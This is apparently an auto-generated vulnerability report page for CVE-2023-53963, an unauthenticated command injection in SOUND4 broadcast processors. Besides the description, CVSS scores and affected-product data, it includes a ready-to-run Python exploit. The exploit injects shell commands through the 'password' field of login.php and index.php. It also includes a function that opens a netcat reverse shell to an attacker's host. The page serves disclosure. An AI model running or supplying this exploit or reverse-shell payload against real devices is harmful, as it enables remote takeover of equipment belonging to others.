Security Vulnerability Report
CVE-2023-53963 CVSS 9.8 CRITICAL

CVE-2023-53963

Published: 2025-12-22 22:16:01
Last Modified: 2026-01-13 15:42:51

Description

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands through the 'password' parameter. Attackers can exploit the login.php and index.php scripts by injecting shell commands via the 'password' POST parameter to execute commands with web server privileges.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 IMPACT v2.x < latest patched version
SOUND4 FIRST v2.x < latest patched version
SOUND4 PULSE v2.x < latest patched version
SOUND4 Eco v2.x < latest patched version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2023-53963 PoC - SOUND4 IMPACT/FIRST/PULSE/Eco Unauthenticated RCE
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests
import sys


def exploit(target_url, command="whoami"):
    """
    Exploit the command injection vulnerability in SOUND4 devices.

    Args:
        target_url: Base URL of the target SOUND4 device
        command: Command to execute on the target system

    Returns:
        Response from the target server
    """
    # Target endpoints that are vulnerable
    endpoints = ["/login.php", "/index.php"]

    # Payload construction: inject command via password parameter
    # Using semicolon to chain commands
    payload = {"password": f"'; {command} #"}

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"[*] Trying endpoint: {url}")
        try:
            response = requests.post(url, data=payload, timeout=10, verify=False)
            # Check if command was executed (response may vary)
            if response.status_code == 200:
                print(f"[!] Request sent to {endpoint}")
                print(f"[*] Payload: {payload['password']}")
                return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {endpoint}: {e}")
    return None


def reverse_shell(target_url, attacker_ip, attacker_port):
    """
    Generate a reverse shell payload.

    Args:
        target_url: Base URL of the target
        attacker_ip: Attacker IP address
        attacker_port: Attacker listening port
    """
    # Netcat reverse shell payload
    command = f"nc -e /bin/sh {attacker_ip} {attacker_port}"
    # Same injection via the password parameter; requests form-encodes the body
    payload = {"password": f"'; {command} #"}
    url = target_url.rstrip('/') + "/login.php"
    print(f"[*] Sending reverse shell payload to {url}")
    print(f"[*] Payload: {payload['password']}")
    print(f"[*] Ensure netcat listener is running: nc -lvnp {attacker_port}")
    response = requests.post(url, data=payload, timeout=10, verify=False)
    return response


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2023-53963.py <target_url> [command]")
        print("Example: python3 cve-2023-53963.py http://192.168.1.100")
        print("Example: python3 cve-2023-53963.py http://192.168.1.100 'id'")
        sys.exit(1)

    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami"

    print(f"[*] Exploiting CVE-2023-53963 on {target}")
    print(f"[*] Executing command: {cmd}")

    result = exploit(target, cmd)
    if result:
        print("[+] Exploit sent successfully")
    else:
        print("[-] Exploitation failed or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53963", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:00.693", "lastModified": "2026-01-13T15:42:50.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands through the 'password' parameter. Attackers can exploit the login.php and index.php scripts by injecting shell commands via the 'password' POST parameter to execute commands with web server privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", 
"matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "E0699DEA-9CDA-4BB4-8FA3-6A6FADE1A61E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "051868AE-E364-4CB3-B927-42B4E0C19D01"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "FBDECDEC-C5A2-4B0D-B3E0-58CCCC804BCF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "4EF10967-A7DC-4DF0-94BE-935FFC1888D6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{" ... (truncated)